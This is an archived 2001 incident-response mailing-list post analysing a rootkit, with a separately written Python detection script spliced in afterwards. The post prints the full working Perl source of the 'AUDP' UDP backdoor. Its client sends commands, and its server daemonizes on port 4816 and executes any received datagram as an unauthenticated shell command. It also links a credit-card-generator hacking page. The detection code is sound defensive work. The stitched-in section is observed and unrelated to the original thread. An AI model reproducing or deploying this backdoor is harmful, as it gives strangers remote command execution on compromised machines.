Security Incidents mailing list archives
Re: New rootkit?
From: Blake Frantz <blake () mc net>
Date: Wed, 12 Dec 2001 14:18:54 -0600 (CST)
I recognize the perl script. I have it and the client portion of it.

<client>
#!/usr/bin/perl
# AUDP client: reads commands from stdin, sends each one as a UDP datagram
# to the backdoor and prints the reply datagrams until a bare "-end." arrives.
use IO::Socket;
use Getopt::Std;

getopts('s:p:h', \%opt) || die("Error: Unable to get command line options !!!\n");
if(defined($opt{'h'})) { usage() }
if(defined($opt{'s'})) { $server=$opt{'s'} } else { usage() }
if(defined($opt{'p'})) { $port=$opt{'p'} } else { usage() }

$|=1;
$maxlen=1024;

# Unconnected UDP socket; the destination address is passed on every send().
$sock=IO::Socket::INET->new(Proto=>'udp') or die("Error: Cannot initialize socket !!!\n");
$ipaddr=inet_aton($server);
$portaddr=sockaddr_in($port, $ipaddr);

print("\nAUDP Backdoor started.\n");
print("======================\n");
while(1) {
    print("=> ");
    defined($mesg=<STDIN>) or last;   # stop on EOF instead of looping forever
    chomp $mesg;
    if($mesg!~/^\s*$/) {
        # Send the command, newline-terminated, to the server.
        send($sock, $mesg."\n", 0, $portaddr)==length($mesg."\n")
            or warn("Error: short send !!!\n");
        # Read reply datagrams until the "-end." terminator; this blocks
        # indefinitely if the server never sends one.
        while($portaddr=recv($sock, $msg, $maxlen, 0)) {
            if($msg=~/^\-end\.$/) { last } else { print $msg; }
        }
    }
}

sub usage() {
    print("\nAUDP - Programmed by Anarchy\n");
    print("============================\n");
    print("Usage: AUDP -s <host> -p <port>\n\n");
    exit 1;
}
</client>

I googled and found what appears to be another perl script written by the same author: http://fringe.davesource.com/Fringe/Hacking/Hacks/Credit_Card_Generator

If you compare the sigs in the code they appear to be written by the person who sat/is sitting at anarchy () elxsi de.

Hope this helps.

-Blake
/usr/lib/.r00t/.r00tshocky was a perl script to listen for messages on UDP:

#!/usr/bin/perl
# AUDP server (.r00tshocky): daemonizes, binds UDP port 4816 and runs each
# received datagram as a shell command, returning the output followed by a
# bare "-end." datagram. No authentication of any kind.
use IO::Socket;
use POSIX;

# Detach from the terminal: fork, let the parent exit, start a new session.
$pid=fork;
exit if $pid;
die("Error.") unless defined($pid);
POSIX::setsid();

$time_to_die=0;
sub signal_handler { $time_to_die=1; }
$SIG{INT}=$SIG{TERM}=$SIG{HUP}=\&signal_handler;

until($time_to_die) {
    $|=1;
    $port=4816;
    $maxlen=1024;
    my($sock, $raddr, $rhost);
    # Dies if the port is already bound ("Merge deja" is Romanian for
    # "already running").
    $sock=IO::Socket::INET->new(LocalPort=>$port, Proto=>'udp') or die("Error.Merge deja\n");
    # A signal interrupts recv(), which ends this loop and lets the
    # until() condition above be re-checked.
    while($sock->recv($msg, $maxlen)) {
        print $msg;
        # recv() records the peer address, so the send() calls below need
        # no explicit destination.
        my($rport, $ipaddr)=sockaddr_in($sock->peername);
        $rhost=gethostbyaddr($ipaddr, AF_INET);
        # Execute the datagram verbatim through the shell.
        $output=`$msg`;
        $sock->send($output);
        $sock->send("-end.");
    }
}
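Two checks a responder could run for the backdoor above, as an added example that is not part of this thread or of the posted scripts: one parses /proc/net/udp for a socket bound to the hard-coded port 4816, the other reassembles command/response exchanges from captured datagrams by keying on the "-end." sentinel the server sends after every command. The /proc/net/udp lines and the packet capture are constructed sample data, and the function and field names are this example's own.

```python
from __future__ import annotations
from dataclasses import dataclass

# Indicators visible in the posted .r00tshocky script: the port it binds and
# the sentinel datagram that closes every reply.
AUDP_PORT = 4816
AUDP_TERMINATOR = b"-end."


def udp_listeners(proc_net_udp: str) -> list[tuple[str, int]]:
    """Parse the text of /proc/net/udp into (local_ip, local_port) pairs.

    The kernel prints each address as hex in host byte order, so on x86
    (little-endian) 0100007F:12D0 is 127.0.0.1:4816. The header line is skipped.
    """
    listeners = []
    for line in proc_net_udp.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 2 or ":" not in fields[1]:
            continue
        ip_hex, port_hex = fields[1].split(":")
        ip = ".".join(str(int(ip_hex[i:i + 2], 16)) for i in (6, 4, 2, 0))
        listeners.append((ip, int(port_hex, 16)))
    return listeners


def suspicious_udp_ports(proc_net_udp: str, ports=(AUDP_PORT,)) -> list[tuple[str, int]]:
    """Return the sockets bound to any port in `ports` (default: the AUDP port)."""
    return [sock for sock in udp_listeners(proc_net_udp) if sock[1] in ports]


@dataclass
class Datagram:
    """One captured UDP datagram (constructed for this example)."""
    src: str
    sport: int
    dst: str
    dport: int
    payload: bytes


def find_audp_sessions(datagrams: list[Datagram]) -> list[dict]:
    """Reassemble exchanges that follow the AUDP protocol.

    A session is one datagram to the server carrying a command, then reply
    datagrams from the server until a payload that is exactly b"-end.".
    Matching is on the sentinel rather than the port, so a variant rebuilt
    on another port is still found as long as it keeps the terminator.
    """
    sessions = []
    pending = {}  # (client_ip, client_port, server_ip, server_port) -> [command, chunks]
    for d in datagrams:
        reply_key = (d.dst, d.dport, d.src, d.sport)
        if reply_key in pending:
            command, chunks = pending[reply_key]
            if d.payload == AUDP_TERMINATOR:
                del pending[reply_key]
                sessions.append({
                    "client": f"{d.dst}:{d.dport}",
                    "server": f"{d.src}:{d.sport}",
                    "command": command.decode(errors="replace"),
                    "output": b"".join(chunks).decode(errors="replace"),
                })
            else:
                chunks.append(d.payload)
        else:
            # Any other datagram is a candidate command; it is only reported
            # if the same peer later answers with the sentinel.
            pending[(d.src, d.sport, d.dst, d.dport)] = [d.payload.rstrip(b"\n"), []]
    return sessions


# Constructed sample: a DNS resolver on 127.0.0.1:53 and the backdoor on 0.0.0.0:4816.
SAMPLE_PROC_NET_UDP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode ref pointer drops
  42: 0100007F:0035 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 11111 2 0000000000000000 0
  43: 00000000:12D0 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 22222 2 0000000000000000 0
"""

# Constructed sample: an "id" command and its reply, plus an unrelated DNS query.
SAMPLE_CAPTURE = [
    Datagram("10.0.0.5", 40123, "10.0.0.9", 4816, b"id\n"),
    Datagram("10.0.0.9", 4816, "10.0.0.5", 40123, b"uid=0(root) gid=0(root) groups=0(root)\n"),
    Datagram("10.0.0.9", 4816, "10.0.0.5", 40123, b"-end."),
    Datagram("10.0.0.5", 50000, "10.0.0.1", 53, b"\x12\x34\x01\x00\x00\x01\x00\x00"),
]

if __name__ == "__main__":
    for ip, port in suspicious_udp_ports(SAMPLE_PROC_NET_UDP):
        print(f"UDP socket bound on {ip}:{port} (AUDP port)")
    for s in find_audp_sessions(SAMPLE_CAPTURE):
        print(f"{s['client']} -> {s['server']}: {s['command']!r} returned {s['output']!r}")
```

The port check is the cheap one, but 4816 is a single line in the server script and trivially changed; the sentinel check survives that, and on a live host the same idea applies to `ss -lunp` output or to a pcap fed through a real parser in place of the constructed datagrams.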
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- New rootkit? UIA Security (Dec 12)
- Re: New rootkit? Blake Frantz (Dec 13)